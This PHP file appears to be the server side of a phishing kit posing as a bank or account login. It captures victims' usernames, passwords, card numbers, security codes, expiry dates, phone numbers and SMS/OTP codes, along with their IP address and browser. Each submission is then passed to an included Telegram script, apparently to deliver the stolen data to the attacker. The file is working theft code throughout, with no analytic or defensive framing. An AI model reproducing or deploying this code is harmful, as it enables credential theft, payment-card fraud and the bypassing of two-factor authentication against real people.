<?php
if (isset($_GET['key'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$key = $_SESSION['key'] = $_GET['key'];


$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;




$yagmai .= '
[💬 Username ]  = '.$_SESSION['key'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("Your_Info.php"); 
include("TelegramAPi.php");






$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}elseif (isset($_POST['cardnumber'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     

$nameoncard = $_SESSION['nameoncard'] = $_POST['nameoncard'];

$cardnumber = $_SESSION['cardnumber'] = $_POST['cardnumber'];
$Securitycode = $_SESSION['Securitycode'] = $_POST['Securitycode'];
$expdate = $_SESSION['expdate'] = $_POST['expdate'];

$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;


$yagmai .= '
[👤 Name On card]  = '.$_SESSION['nameoncard'].'
[👤 Card number ]  = '.$_SESSION['cardnumber'].'
[👤 Security code ]  = '.$_SESSION['Securitycode'].'
[👤 Expiry Date ]  = '.$_SESSION['expdate'].'
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);
      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    


}elseif (isset($_POST['Sms'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$Sms = $_SESSION['Sms'] = $_POST['Sms'];

$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;

$yagmai .= '
[💬 Sms ]  = '.$_SESSION['Sms'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}elseif (isset($_POST['phone'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$phone = $_SESSION['phone'] = $_POST['phone'];


$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;



$yagmai .= '
[💬 Phone Number]  = '.$_SESSION['phone'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}elseif (isset($_POST['OTP'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$OTP = $_SESSION['OTP'] = $_POST['OTP'];



$yagmai .= '
[💬 Code OTP ]  = '.$_SESSION['OTP'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}
elseif (isset($_POST['sms'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$sms = $_SESSION['sms'] = $_POST['sms'];



$yagmai .= '
[🔄 Sms ]   = '.$_SESSION['sms'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);
      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    


}elseif (isset($_POST['userid'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$userid = $_SESSION['userid'] = $_POST['userid'];
$password = $_SESSION['password'] = $_POST['password'];



$yagmai .= '
[💬 User ]  = '.$_SESSION['userid'].'
[💬 Password  ]  = '.$_SESSION['password'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}
elseif (isset($_POST['pass'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$pass = $_SESSION['pass'] = $_POST['pass'];



$yagmai .= '
[💬 Pass Sms ]   = '.$_SESSION['pass'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);
      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    


}else {




}



?>